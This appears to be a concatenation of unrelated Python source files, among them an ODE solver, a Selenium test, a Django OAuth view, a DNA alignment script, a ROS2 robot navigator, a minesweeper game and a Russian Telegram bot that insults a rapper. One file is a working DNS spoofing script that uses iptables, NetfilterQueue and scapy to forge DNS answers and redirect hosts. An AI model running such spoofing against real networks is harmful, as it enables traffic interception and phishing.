created_at = Column(TIMESTAMP(timezone=True), default=datetime.datetime.now, nullable=False,
server_default=text('CURRENT_TIMESTAMP'))
updated_at = Column(TIMESTAMP(timezone=True), default=datetime.datetime.now, onupdate=datetime.datetime.now,
nullable=False, server_default=text('CURRENT_TIMESTAMP'),
server_onupdate=text('CURRENT_TIMESTAMP'))
@classmethod
def bulk_insert_answer_rule(cls, session, rows):
answers = [cls(**row) for row in rows]
session.bulk_save_objects(answers)
session.commit()
return True
@classmethod
def find_proper_reply_id(cls, session, combination_string):
reply_id = session.query(cls.reply_id).filter(cls.survey_answer_combinations == combination_string).scalar()
return reply_id
|
#implementation of second order RK for second order ODE:
#We will use this to solve the precession of the preohelion of mercury later on
#example:
# The 2nd order ode is : (dy/dx)^2 + dy/dx -6y = 0
# the decoupled equations are:
# dy/dx = z;
# dz/dx = 6y - v;
# start by defining two general first order ODES
def f(x,y,z):
return float(z);
def g(x,y,z):
return float((6*y - z));
def main():
#select step size
h = .05;
#start of interval
s = 0;
e = 1;
#initial conditions
xi = 0.0;
yi = 3.0;
zi = 1.0;
while(s <= e):
k0 = (h * f(xi,yi,zi));
l0 = (h * g(xi,yi,zi));
k1 = h * f(xi + (1.0/2.0)*h, yi + (1.0/2.0)*k0, zi + (1.0/2.0)*l0);
l1 = h * g(xi + (1.0/2.0)*h, yi + (1.0/2.0)*k0, zi + (1.0/2.0)*l0);
k2 = h * f(xi + (1.0/2.0)*h,yi + (1.0/2.0)* k1, zi+ (1.0/2.0)*l1);
l2 = h * g(xi + (1.0/2.0)*h, yi + (1.0/2.0) *k1, zi + (1.0/2.0) * l1);
k3 = h * f(xi + h, yi + k2, zi + l2);
l3 = h * g(xi + h, yi + k2, zi + l2);
#xi = xi + h;
yi = yi + ((1.0/6.0) * (k0 + 2*k1 + 2*k2 + k3));
zi = zi + (1.0/6.0) * (l0 + 2*l1 + 2*l2 + l3);
s = s+h;
print(yi);
print(zi);
main(); |
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
LINK = "http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/"
def test_add_to_cart_button_is_displayed(browser):
browser.get(LINK)
add_to_cart_button = WebDriverWait(browser, 5).until(
EC.visibility_of_element_located((By.CSS_SELECTOR, 'form#add_to_basket_form>button')))
assert add_to_cart_button.is_displayed()
|
#! /usr/bin/env python2.7
from scapy.all import *
from netfilterqueue import NetfilterQueue
import os,sys
def usage():
print "[*]Usage: python dnsspoof_with_queue.py [host file] [DNS_SERVER_IP]"
def modify(packet):
print "Got packet"
pkt = IP(packet.get_payload()) #converts the raw packet to a scapy compatible string
#modify the packet all you want here
if not pkt.haslayer(DNSQR):
packet.accept()
else:
queried = pkt[DNS].qd.qname
for key in dict:
if queried.find(key) != -1:
spoofed_IP = dict[key]
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\
an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=spoofed_IP))
packet.set_payload(str(spoofed_pkt))
packet.accept()
print '[+] Redirecting ' + pkt[IP].src + " to " + spoofed_IP +" for domain " + queried
return
#print "No entries in host file for domain " + queried
print "Forwarded packets to dns"
packet.accept()
os.system('iptables -A FORWARD -p udp --dport 53 -j NFQUEUE --queue-num 1')
nfqueue = NetfilterQueue()
nfqueue.bind(1, modify)
try:
print "[*] waiting for data"
nfqueue.run()
except KeyboardInterrupt:
pass |
# System
from datetime import timedelta
# Django
from django.utils import timezone
from django.views.generic import View
from django.shortcuts import render
from django.shortcuts import redirect
from django.urls import reverse
from django.http import Http404
# Open Pipelines
from ..models import User
from ..services import ServiceManager
class LoginView(View):
def get(self, request):
service_manager = ServiceManager()
return render(request, "login.html", {
"services" : service_manager.get_services()
})
class LoginWithServiceView(View):
def get(self, request, service_id):
service_manager = ServiceManager()
try:
service = service_manager.get_service(service_id)
except ServiceManager.DoesNotExist:
raise Http404()
# User was redirected back with an error
if request.GET.get("error") != None:
return render(request, "login_error.html")
# User was redirected back with an authorization code
if request.GET.get("code") != None:
oauth_code = request.GET.get("code")
oauth_data = service.process_oauth(oauth_code)
if oauth_data == None:
return render(request, "login_error.html")
user, \
user_created = User.objects.update_or_create(
username = "{0}:{1}".format(service.get_id(), oauth_data.get("username")),
defaults = {
"display_name" : oauth_data.get("display_name"),
"service_id" : service.get_id(),
"service_username": oauth_data.get("username"),
"service_atoken" : oauth_data.get("atoken"),
"service_rtoken" : oauth_data.get("rtoken"),
"service_etoken" : oauth_data.get("etoken"),
"last_login" : timezone.now(),
}
)
request.session.flush()
request.session["user_uuid"] = str(user.uuid)
return redirect(reverse("index"))
# Redirect user to OAuth2 page
return redirect(service.get_oauth_url())
|
import sys
from itertools import product
from rosalind_utility import parse_fasta
def multiple_alignment(str_list):
str_list = ["-" + string for string in str_list]
score_mat = {}
backtrack_mat = {}
def add_tuples_elemwise(t1, t2):
return tuple(sum(x) for x in zip(t1, t2))
## all possible "moves"
perm_list = list(product([0, -1], repeat=len(str_list)))[1:]
## fill n-dimensional score and backtrack matrices
for index in product(*map(range, map(lambda s: len(s) + 1, str_list))):
if index.count(0) >= len(str_list) - 1:
if sum(index) == 0:
score_mat[index] = 0
else:
score_mat[index] = -max(index)
move = tuple(0 if id == 0 else -1 for id in index)
bck = -1
for idx, perm in enumerate(perm_list):
if perm == move:
bck = idx
break
backtrack_mat[index] = bck
else:
possible_scores = []
for perm_idx, move in enumerate(perm_list):
prev_idx = add_tuples_elemwise(index, move)
if -1 not in prev_idx:
prev_score = score_mat[prev_idx]
chars = [str_list[i][index[i] - 1] if val == -1 else "-" for i, val in enumerate(move)]
current_cost = 0
for i in range(len(chars) - 1):
for j in range(i + 1, len(chars)):
if chars[i] != chars[j]:
current_cost -= 1
possible_scores.append((prev_score + current_cost, perm_idx))
score_mat[index], backtrack_mat[index] = max(possible_scores, key=lambda p: p[0])
## backtrack
alignment = ["" for x in str_list]
current_index = list(map(len, str_list))
max_score = score_mat[tuple(current_index)]
while sum(current_index) != 0:
back_perm_idx = backtrack_mat[tuple(current_index)]
permutation = perm_list[back_perm_idx]
for i, perm_value in enumerate(permutation):
if perm_value == 0:
alignment[i] = "-" + alignment[i]
else:
alignment[i] = str_list[i][current_index[i] - 1] + alignment[i]
current_index = add_tuples_elemwise(tuple(current_index), permutation)
## remove all "-" columns
to_rm_idx = []
for pos in range(len(alignment[0])):
temp = [x[pos] for x in alignment]
if all(x == "-" for x in temp):
to_rm_idx.append(pos)
for i in range(len(alignment)):
alignment[i] = "".join([char for idx, char in enumerate(alignment[i]) if idx not in to_rm_idx])
return max_score, alignment
if __name__ == "__main__":
'''
Given: A collection of four DNA strings of length at most 10 bp in FASTA format.
Return: A multiple alignment of the strings having maximum score, where we score matched symbols 0 (including
matched gap symbols) and all mismatched symbols -1 (thus incorporating a linear gap penalty of 1).
'''
input_lines = sys.stdin.read().splitlines()
DNA_strings_list = list(parse_fasta(input_lines).values())
score, alignment = multiple_alignment(DNA_strings_list)
print(score)
for aligned in alignment:
print(aligned)
|
# Copyright 2016 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rclpy
from rclpy.node import Node
from std_msgs.msg import String
from nav_msgs.msg import Odometry
from geometry_msgs.msg import Twist
from rclpy.qos import qos_profile_sensor_data
from sensor_msgs.msg import LaserScan
from nav_msgs.msg import OccupancyGrid
from tf2_ros import LookupException, ConnectivityException, ExtrapolationException
import numpy as np
import matplotlib.pyplot as plt
import tf2_ros
import math
import cmath
import time
import scipy.stats
import random
from PIL import Image, ImageDraw
# constants
rotatechange = 0.5
speedchange = 0.1
occ_bins = [-1, 0, 50, 100]
stop_distance = 0.55
front_angle = 30
front_angles = range(-front_angle, front_angle + 1, 1)
scanfile = 'lidar.txt'
mapfile = f"newmap{time.strftime('%Y%m%d%H%M%S')}.txt"
laserfile = 'laser.txt'
angle_array = []
points = []
nan_array = []
laser_array = []
map_bg_color = 1
random_angle = [0, -90, 90, 180]
# code from https://automaticaddison.com/how-to-convert-a-quaternion-into-euler-angles-in-python/
def euler_from_quaternion(x, y, z, w):
"""
Convert a quaternion into euler angles (roll, pitch, yaw)
roll is rotation around x in radians (counterclockwise)
pitch is rotation around y in radians (counterclockwise)
yaw is rotation around z in radians (counterclockwise)
"""
t0 = +2.0 * (w * x + y * z)
t1 = +1.0 - 2.0 * (x * x + y * y)
roll_x = math.atan2(t0, t1)
t2 = +2.0 * (w * y - z * x)
t2 = +1.0 if t2 > +1.0 else t2
t2 = -1.0 if t2 < -1.0 else t2
pitch_y = math.asin(t2)
t3 = +2.0 * (w * z + x * y)
t4 = +1.0 - 2.0 * (y * y + z * z)
yaw_z = math.atan2(t3, t4)
return roll_x, pitch_y, yaw_z # in radians
class AutoNav(Node):
def __init__(self):
super().__init__('auto_nav')
# create publisher for moving TurtleBot
self.publisher_ = self.create_publisher(Twist, 'cmd_vel', 10)
self.fly_ = self.create_publisher(String, 'fly', 11)
self.get_logger().info('Created publisher')
# create subscription to track orientation
self.odom_subscription = self.create_subscription(
Odometry,
'odom',
self.odom_callback,
10)
self.get_logger().info('Created subscriber')
self.odom_subscription # prevent unused variable warning
# initialize variables
self.roll = 0
self.pitch = 0
self.yaw = 0
self.x = 0
self.y = 0
self.center_x = 0
self.center_y = 0
self.unmap_x = 0
self.unmap_y = 0
self.dist_x = 0
self.dist_y = 0
self.angle_to_unmap = 0
self.dist_to_unmap = 0
self.prev_dist_to_unmap = []
self.laser_count = 0
self.why_stop = 0
self.tfBuffer = tf2_ros.Buffer()
self.tfListener = tf2_ros.TransformListener(self.tfBuffer, self)
# create subscription to track occupancy
self.occ_subscription = self.create_subscription(
OccupancyGrid,
'map',
self.occ_callback,
qos_profile_sensor_data)
self.occ_subscription # prevent unused variable warning
self.occdata = np.array([])
# create subscription to track lidar
self.scan_subscription = self.create_subscription(
LaserScan,
'scan',
self.scan_callback,
qos_profile_sensor_data)
self.scan_subscription # prevent unused variable warning
self.laser_range = np.array([])
def odom_callback(self, msg):
# self.get_logger().info('In odom_callback')
orientation_quat = msg.pose.pose.orientation
self.roll, self.pitch, self.yaw = euler_from_quaternion(orientation_quat.x, orientation_quat.y,
orientation_quat.z, orientation_quat.w)
self.x = msg.pose.pose.position.x
self.y = msg.pose.pose.position.y
def occ_callback(self, msg):
# self.get_logger().info('In occ_callback')
# create numpy array
msgdata = np.array(msg.data)
# compute histogram to identify percent of bins with -1
# occ_counts = np.histogram(msgdata,occ_bins)
# calculate total number of bins
# total_bins = msg.info.width * msg.info.height
# log the info
# self.get_logger().info('Unmapped: %i Unoccupied: %i Occupied: %i Total: %i' % (occ_counts[0][0], occ_counts[0][1], occ_counts[0][2], total_bins))
# compute histogram to identify bins with -1, values between 0 and below 50,
# and values between 50 and 100. The binned_statistic function will also
# return the bin numbers so we can use that easily to create the image
occ_counts, edges, binnum = scipy.stats.binned_statistic(msgdata, np.nan, statistic='count', bins=occ_bins)
# get width and height of map
iwidth = msg.info.width
iheight = msg.info.height
# calculate total number of bins
total_bins = iwidth * iheight
# log the info
# self.get_logger().info('Unmapped: %i Unoccupied: %i Occupied: %i Total: %i' % (occ_counts[0], occ_counts[1], occ_counts[2], total_bins))
# find transform to obtain base_link coordinates in the map frame
# lookup_transform(target_frame, source_frame, time)
try:
trans = self.tfBuffer.lookup_transform('map', 'base_link', rclpy.time.Time())
except (LookupException, ConnectivityException, ExtrapolationException) as e:
self.get_logger().info('No transformation found')
return
cur_pos = trans.transform.translation
cur_rot = trans.transform.rotation
# self.get_logger().info('Trans: %f, %f' % (cur_pos.x, cur_pos.y))
# convert quaternion to Euler angles
roll, pitch, yaw = euler_from_quaternion(cur_rot.x, cur_rot.y, cur_rot.z, cur_rot.w)
# self.get_logger().info('Rot-Yaw: R: %f D: %f' % (yaw, np.degrees(yaw)))
# get map resolution
map_res = msg.info.resolution
# get map origin struct has fields of x, y, and z
map_origin = msg.info.origin.position
# get map grid positions for x, y position
grid_x = round((cur_pos.x - map_origin.x) / map_res)
grid_y = round(((cur_pos.y - map_origin.y) / map_res))
# self.get_logger().info('Grid Y: %i Grid X: %i' % (grid_y, grid_x))
# binnum go from 1 to 3 so we can use uint8
# convert into 2D array using column order
odata = np.uint8(binnum.reshape(msg.info.height, msg.info.width))
# set current robot location to 0
odata[grid_y][grid_x] = 0
self.occdata = odata
# print to file
np.savetxt(mapfile, self.occdata)
def scan_callback(self, msg):
# self.get_logger().info('In scan_callback')
# create numpy array
self.laser_range = np.array(msg.ranges)
# print to file
# np.savetxt(scanfile, self.laser_range)
# replace 0's with nan
self.laser_range[self.laser_range == 0] = np.nan
# function to rotate the TurtleBot
def rotatebot(self, rot_angle):
self.get_logger().info('In rotatebot')
# create Twist object
twist = Twist()
# get current yaw angle
current_yaw = self.yaw
# log the info
self.get_logger().info('Current: %f' % math.degrees(current_yaw))
# we are going to use complex numbers to avoid problems when the angles go from
# 360 to 0, or from -180 to 180
c_yaw = complex(math.cos(current_yaw), math.sin(current_yaw))
# calculate desired yaw
target_yaw = current_yaw + math.radians(rot_angle)
# convert to complex notation
c_target_yaw = complex(math.cos(target_yaw), math.sin(target_yaw))
self.get_logger().info('Desired: %f' % math.degrees(cmath.phase(c_target_yaw)))
# divide the two complex numbers to get the change in direction
c_change = c_target_yaw / c_yaw
# get the sign of the imaginary component to figure out which way we have to turn
c_change_dir = np.sign(c_change.imag)
# set linear speed to zero so the TurtleBot rotates on the spot
twist.linear.x = 0.0
# set the direction to rotate
twist.angular.z = c_change_dir * rotatechange
# start rotation
self.publisher_.publish(twist)
# we will use the c_dir_diff variable to see if we can stop rotating
c_dir_diff = c_change_dir
# self.get_logger().info('c_change_dir: %f c_dir_diff: %f' % (c_change_dir, c_dir_diff))
# if the rotation direction was 1.0, then we will want to stop when the c_dir_diff
# becomes -1.0, and vice versa
while (c_change_dir * c_dir_diff > 0):
# allow the callback functions to run
rclpy.spin_once(self)
current_yaw = self.yaw
# convert the current yaw to complex form
c_yaw = complex(math.cos(current_yaw), math.sin(current_yaw))
# self.get_logger().info('Current Yaw: %f' % math.degrees(current_yaw))
# get difference in angle between current and target
c_change = c_target_yaw / c_yaw
# get the sign to see if we can stop
c_dir_diff = np.sign(c_change.imag)
# self.get_logger().info('c_change_dir: %f c_dir_diff: %f' % (c_change_dir, c_dir_diff))
self.get_logger().info('End Yaw: %f' % math.degrees(current_yaw))
# set the rotation speed to 0
twist.angular.z = 0.0
# stop the rotation
self.publisher_.publish(twist)
def pick_direction(self):
# self.get_logger().info('In pick_direction')
# np.savetxt(laserfile, self.laser_range)
if self.laser_range.size != 0:
i = 0
else:
lr2i = 0
self.get_logger().info('No data!')
# rotate to that direction
self.rotatebot(float(lr2i))
# start moving
self.get_logger().info('Start moving')
twist = Twist()
twist.linear.x = speedchange
twist.angular.z = 0.0
# not sure if this is really necessary, but things seem to work more
# reliably with this
time.sleep(1)
self.publisher_.publish(twist)
def stopbot(self):
self.get_logger().info('In stopbot')
# publish to cmd_vel to move TurtleBot
twist = Twist()
twist.linear.x = 0.0
twist.angular.z = 0.0
# time.sleep(1)
self.publisher_.publish(twist)
def bfs(self, graph, start, end):
queue = []
visited = []
queue.append(start)
visited.append(start)
w =[]
l = 0
while len(queue) > 0:
path = queue.pop(0)
if isinstance(path[0], int):
p = path
l = 1
else:
p = path[-1]
l = 0
x = p[0]
y = p[1]
# node x+1 y
if x + 1 < 100 and [x+1, y] not in visited and graph[x + 1, y] != 0:
if l == 1:
q = []
q.append(path)
q.append([x + 1, y])
queue.append(q)
if x + 1 == end[0] and y == end[1]:
return q
else:
i = 0
new = []
while i <= len(path) - 1:
new.append(path[i])
i = i+1
new.append([x + 1, y])
queue.append(new)
if x+1 == end[0] and y == end[1]:
return new
visited.append([x+1, y])
# node x+1 y-1
if x+1<100 and y-1<100 and [x+1, y-1] not in visited and graph[x+1, y-1] != 0:
if l == 1:
q = []
q.append(path)
q.append([x+1, y-1])
queue.append(q)
if x+1 == end[0] and y-1 == end[1]:
return q
else:
i = 0
new = []
while i <= len(path) - 1:
new.append(path[i])
i = i+1
new.append([x+1, y-1])
queue.append(new)
if x+1 == end[0] and y-1 == end[1]:
return new
visited.append([x+1, y-1])
# node x y-1
if x < 100 and y - 1 < 100 and [x + 1, y - 1] not in visited and graph[x + 1, y - 1] != 0:
if l == 1:
q = []
q.append(path)
q.append([x, y - 1])
queue.append(q)
if x == end[0] and y - 1 == end[1]:
return q
else:
i = 0
new = []
while i <= len(path) - 1:
new.append(path[i])
i = i + 1
new.append([x, y + 1])
queue.append(new)
if x + 1 == end[0] and y + 1 == end[1]:
return new
visited.append([x + 1, y + 1])
if x + 1 < 100 and y + 1 < 100 and [x + 1, y + 1] not in visited and graph[x + 1, y + 1] != 0:
if l == 1:
q = []
q.append(path)
q.append([x + 1, y + 1])
queue.append(q)
if x + 1 == end[0] and y + 1 == end[1]:
return q
else:
i = 0
new = []
while i <= len(path) - 1:
new.append(path[i])
i = i + 1
new.append([x + 1, y + 1])
queue.append(new)
if x + 1 == end[0] and y + 1 == end[1]:
return new
visited.append([x + 1, y + 1])
if x + 1 < 100 and y + 1 < 100 and [x + 1, y + 1] not in visited and graph[x + 1, y + 1] != 0:
if l == 1:
q = []
q.append(path)
q.append([x + 1, y + 1])
queue.append(q)
if x + 1 == end[0] and y + 1 == end[1]:
return q
else:
i = 0
new = []
while i <= len(path) - 1:
new.append(path[i])
i = i + 1
new.append([x + 1, y + 1])
queue.append(new)
if x + 1 == end[0] and y + 1 == end[1]:
return new
visited.append([x + 1, y + 1])
if x + 1 < 100 and y + 1 < 100 and [x + 1, y + 1] not in visited and graph[x + 1, y + 1] != 0:
if l == 1:
q = []
q.append(path)
q.append([x + 1, y + 1])
queue.append(q)
if x + 1 == end[0] and y + 1 == end[1]:
return q
else:
i = 0
new = []
while i <= len(path) - 1:
new.append(path[i])
i = i + 1
new.append([x + 1, y + 1])
queue.append(new)
if x + 1 == end[0] and y + 1 == end[1]:
return new
visited.append([x + 1, y + 1])
if x + 1 < 100 and y + 1 < 100 and [x + 1, y + 1] not in visited and graph[x + 1, y + 1] != 0:
if l == 1:
q = []
q.append(path)
q.append([x + 1, y + 1])
queue.append(q)
if x + 1 == end[0] and y + 1 == end[1]:
return q
else:
i = 0
new = []
while i <= len(path) - 1:
new.append(path[i])
i = i + 1
new.append([x + 1, y + 1])
queue.append(new)
if x + 1 == end[0] and y + 1 == end[1]:
return new
visited.append([x + 1, y + 1])
def mover(self):
try:
# initialize variable to write elapsed time to file
# contourCheck = 1
# find direction with the largest distance from the Lidar,
# rotate to that direction, and start moving
self.pick_direction()
while rclpy.ok():
if self.laser_range.size != 0:
# msg = String()
# msg.data = "fly"
# self.fly_.publish(msg)
# self.laser_count += 1
# check distances in front of TurtleBot and find values less
# than stop_distance
lri = (self.laser_range[front_angles] < float(stop_distance)).nonzero()
# if the list is not empty
if (len(lri[0]) > 0):
self.why_stop = 2
# stop moving
self.stopbot()
# find direction with the largest distance from the Lidar
# rotate to that direction
# start moving
self.pick_direction()
# allow the callback functions to run
rclpy.spin_once(self)
except Exception as e:
print(e)
# Ctrl-c detected
finally:
# stop moving
self.stopbot()
def main(args=None):
rclpy.init(args=args)
auto_nav = AutoNav()
auto_nav.mover()
# create matplotlib figure
# plt.ion()
# plt.show()
# Destroy the node explicitly
# (optional - otherwise it will be done automatically
# when the garbage collector destroys the node object)
auto_nav.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
|
# @Title: 打家劫舍 (House Robber)
# @Author: 2464512446@qq.com
# @Date: 2020-11-23 12:10:29
# @Runtime: 32 ms
# @Memory: 13.5 MB
class Solution:
def rob(self, nums: List[int]) -> int:
if not nums:
return 0
size = len(nums)
if size < 2:
return nums[0]
dp = [0] * size
dp[0] = nums[0]
dp[1] = max(nums[0],nums[1])
for i in range(2,size):
dp[i] = max(dp[i-1],dp[i-2] + nums[i])
# print(dp)
return dp[-1]
|
import telebot
import config
import random
import numpy
e = 0
bot = telebot.TeleBot(config.TOKEN)
@bot.message_handler(content_types=['text'])
def lalala(message):
t = message.text
arr = []
arr.append(message.text)
if t == "/say":
array = ["Я крутой", "Сбежал из дурки", "Я - патриот Российской Федерации", "Ставь лайк чтобы жалко", "Что все пристали к этому Путену???",
"Моргенштерн - козел"]
bot.send_message(message.chat.id, random.choice(array))
elif "морген" in t.lower() and "дурк" in t.lower():
bot.send_message(message.chat.id, "Спорный вопрос, но могу сказать одно")
bot.send_message(message.chat.id, "Моргештерн - дурачок!!")
elif "дурк" in t.lower():
array = ["Зачем говорить про дурку?", "Дурка - как раз твое место!", "Путин - класс, и это не обсуждается", "Я крутой, а ты из дурки!",
"Мне тебя жалко, раз у тебя на устах лишь психиатрическая больница"]
textOfArray = random.choice(array)
a = random.choice([0, 1, 2, 3, 4, 5])
if textOfArray == "Мне тебя жалко, раз у тебя на устах лишь психиатрическая больница":
if a == 1:
textOfArray += " номер 4"
elif a == 2:
textOfArray += " номер 13"
elif a == 3:
textOfArray += " номер 65"
elif a == 4:
textOfArray += " номер 1411"
elif a == 5:
textOfArray += " номер 534"
bot.send_message(message.chat.id, textOfArray)
elif "морген" in t.lower():
bot.send_message(message.chat.id, "Моргештерн - дебил")
bot.send_message(message.chat.id, "Он реально тупой")
bot.send_message(message.chat.id, "дурачок")
elif t == "/talk":
e += 1
if e > 3:
r = random.choice(arr)
while True:
a = random.choice([0, 1])
if a == 0: break
r += " " + random.choice
bot.send_message(message.chat.id, r)
else:
r = "Их всего ", e
bot.send_message(message.chat.id, "Недостаточно сообщений для воспроизведения")
bot.send_message(message.chat.id, r)
else:
array2 = ["Не понял вас", "Вот скажите мне, зачем вы мне это написали?", "Не понимаю вас вообще", "Что вы несете, простите?",
"Не понимаю вас. Что ж, я еще развиваюсь", "Не нравится мне такой ваш акцент", message.text]
bot.send_message(message.chat.id, random.choice(array2))
bot.polling(none_stop=True)
|
# Anjali Mangla
# 10/08/2018
# This code is the code for a minesweeper game in which participants must flag all of the bombs and not uncover any bombs before they finish the game.
# This is the link on string splitting:
# https://www.geeksforgeeks.org/python-string-split/
# On my honor, I have neither given nor received unauthorized aid.
import sys
import random as r
# keep track of flag positions
flags = []
# count of the spaces that have been revealed
# find out how many have been revealed
numRevealed = 0
correctFlags = 0
# keep track of bomb positions
bombs = []
# list keeps track of the zero
zerosRevealed = []
# get width, height and number of bombs
while True:
try:
w = int(sys.argv[1]) + 2
h = int(sys.argv[2]) + 2
b = int(sys.argv[3])
break
except ValueError:
print("Sorry, that is not an integer! Try again.")
# set field and user field
field = [[0]*w for x in range(h)]
userField = [["X"]*w for x in range(h)]
# start the game
def start():
global w
global h
global b
# MAKE AN ARRAY OF THE X AND Y VALUES OF THE BOMBS
for number in range(b):
x = r.randrange(1,w-1)
y = r.randrange(1,h-1)
# giving another chance to randomize in case the x,y are the same position
for a in range(len(bombs)):
if x == bombs[a][0] and y == bombs[a][1]:
x = r.randrange(1,w-1)
y = r.randrange(1,h-1)
# array keeps track of bomb positions
bombs.append([x,y])
field[y][x] = "*"
# check around the bomb and add numbers
for y in range(1,h-1):
for x in range(1,w-1):
if field[y][x] == "*":
if field[y][x+1] != "*":
# one position to the right
field[y][x+1] += 1
if field[y][x-1] != "*":
# one position to the left
field[y][x-1] += 1
if field[y+1][x] != "*":
# one position above
field[y+1][x] += 1
if field[y-1][x] != "*":
# one position below
field[y-1][x] += 1
if field[y+1][x+1] != "*":
field[y+1][x+1] += 1
if field[y-1][x+1] != "*":
field[y-1][x+1] += 1
if field[y+1][x-1] != "*":
field[y+1][x-1] += 1
if field[y-1][x-1] != "*":
field[y-1][x-1] += 1
print("Welcome to Minesweeper! You must flag all of the bombs in order to win the game. The top left corner of the board is (1,1) and going to the right adds to the x-value and down adds to the y-value. Make sure you flag all the bombs and show us your mastery of mine sweeping!")
"""
for y in range(1,h-1):
for x in range(1,w-1):
print(field[y][x],end=" ")
print("")
"""
printUserField()
choose()
# print at the end with 0s turning into the right number
# this is my "hidden solution" field
# choose the space, c or f
def choose():
global w
global h
global b
space = input("Choose a space to either clear or flag. Provide the x and y coordinates, and type 'f' for flag and 'c' for clear. Enter your answer in the following format: x, y, [f or c] ") # can command line arguments work outside first python file calling
# if flag, else (else if clear)
userChoice = space.split(',')
y = int(userChoice[1])
x = int(userChoice[0])
if userChoice[2] == "f":
if userField[y][x] == "X":
userField[y][x] = "f"
flags.append([x,y])
printUserField()
checkFlags()
else:
print("You've already revealed that space! You can't flag it now!")
printUserField()
checkFlags()
else:
# check using solution
if field[y][x] == "*":
gameOver()
else:
if userField[y][x] == "f":
flags.remove([x,y])
userField[y][x] = field[y][x]
printUserField()
checkFlags()
elif field[y][x] == 0:
# reveal contiguous spaces
zerosRevealed.append([x,y])
checkZeroes()
printUserField()
choose()
else:
userField[y][x] = field[y][x]
# check flags even when clearing because if the last space on the board is revealed through clear, and the flags are more than the number of bombs, then checkFlags needs to be called in order to issue warning statement
printUserField()
checkFlags()
#reference the user field so they see what's been revealed
def printUserField():
global w
global h
global b
for y in range(1,h-1):
for x in range(1,w-1):
print(userField[y][x],end=" ")
print("")
# while loop saying while whole board is not filled, do this action, and when it is full, check to see if the flags are over bombs
# GAME OVER! Don't get second chance...
def gameOver():
print("Sorry, you just unearthed a bomb!")
# check if the flags are all correct
def checkFlags():
global numRevealed
global correctFlags
global w
global h
global b
# tell the user if they have revealed the entire board, but have too many flags, that they need to keep going
if len(flags) > b:
for y in range(1,h-1):
for x in range(1,w-1):
if userField[y][x] != "X":
numRevealed += 1
if numRevealed == (w-2)*(h-2):
print("Uh oh! Looks like you flagged some spaces that aren't bombs. Keep going!")
# reset the number revealed variable
numRevealed = 0
for y in range(1,h-1):
for x in range(1,w-1):
if userField[y][x] != "X":
if userField[y][x] == "f" and field[y][x] != "*":
break
numRevealed += 1
if userField[y][x] == "f":
numRevealed -= 1
if numRevealed == (w-2)*(h-2) - b:
win()
numRevealed = 0
# only useful to check if flags are in the right place if the number of flags = bombs
if len(flags) == b:
for i in range(b):
if userField[bombs[i][1]][bombs[i][0]] == "f":
correctFlags += 1
if correctFlags == b:
win()
else:
choose()
else:
choose()
# needs to reupdate itself each time
correctFlags = 0
# YOU WON! Play again or not.
def win():
playAgain = input("Yay! You won! You just swept the mines like a champ.\nWould you like to play again? Answer 'Y' or 'N'")
if playAgain == 'Y':
field = [[0]*w for x in range(h)]
userField = [["X"]*w for x in range(h)]
start()
else:
print("Goodbye!")
# check the zeros for contiguous and revealing
def checkZeroes():
global numRevealed
global w
global h
global b
while zerosRevealed:
originaly = zerosRevealed[0][1]
originalx = zerosRevealed[0][0]
zerosRevealed.remove(zerosRevealed[0])
for y in range(originaly-1,originaly+2):
for x in range(originalx-1,originalx+2):
if field[y][x] == 0 and userField[y][x] == "X":
if y > 0 and y < h-1 and x > 0 and x < w-1:
zerosRevealed.append([x,y])
userField[y][x] = field[y][x]
# start the program
start() |
# all previous tutorials have been using
# procedure-oriented programming
# in this section, we'll make classes and do OOP stuff
# Objects can store data using ordinary variables that
# belong to the object. Variables that belong to an object
# or class are referred to as fields. Objects can also have
# functionality by using functions that belong to a class.
# Such functions are called methods of the class.
# This terminology is important because it helps us to
# differentiate between functions and variables which are
# independent and those which belong to a class or object.
# Collectively, the fields and methods can be referred to as
# the attributes of that class.
# Fields are of two types - they can belong to each
# instance/object of the class or they can belong to the class itself.
# They are called instance variables and class variables respectively.
# the 'self' in Python is equivalent to the 'this' reference in C# and Java
class Person:
pass
p = Person()
print(p)
# result:
# <__main__.Person instance at 0x10171f518>
print()
class Robot:
"""Represents a robot, with a name."""
# A class variable, counting the number of robots
population = 0
# for doing initialization of the object
def __init__(self, name):
"""Initializes the data."""
self.name = name
print("(Initializing {})".format(self.name))
# When this person is created, the robot
# adds to the population
Robot.population += 1
def die(self):
"""I am dying."""
print("{} is being destroyed!".format(self.name))
Robot.population -= 1
if Robot.population == 0:
print("{} was the last one.".format(self.name))
else:
print("There are still {:d} robots working.".format(
Robot.population))
def say_hi(self):
"""Greeting by the robot.
Yeah, they can do that."""
print("Greetings, my masters call me {}.".format(self.name))
# The how_many is actually a method that belongs to the class
# and not to the object.
# using the @classmethod decorator
@classmethod
def how_many(cls):
"""Prints the current population."""
print("We have {:d} robots.".format(cls.population))
droid1 = Robot("R2-D2")
droid1.say_hi()
Robot.how_many()
droid2 = Robot("C-3PO")
droid2.say_hi()
Robot.how_many()
print("\nRobots can do some work here.\n")
print("Robots have finished their work. So let's destroy them.")
droid1.die()
droid2.die()
Robot.how_many()
# inheritance and polymorphism are both also things, duh
|
from typing import List, Dict, Optional, Union
import numpy as np
from jax import scipy as scipy
from jax import numpy as jnp
from autumn.model_features.outputs import OutputsBuilder
from autumn.model_features.agegroup import convert_param_agegroups
from autumn.models.sm_covid2.parameters import TimeDistribution, VocComponent, AgeSpecificProps
from .constants import IMMUNITY_STRATA, Compartment, ImmunityStratum
from autumn.core.utils.utils import weighted_average
from autumn.models.sm_jax.outputs import apply_odds_ratio_to_proportion
from summer2.parameters import Function, Data, DerivedOutput
def gamma_cdf(shape, scale, x):
return scipy.special.gammainc(shape, x / scale)
def get_immunity_prop_modifiers(
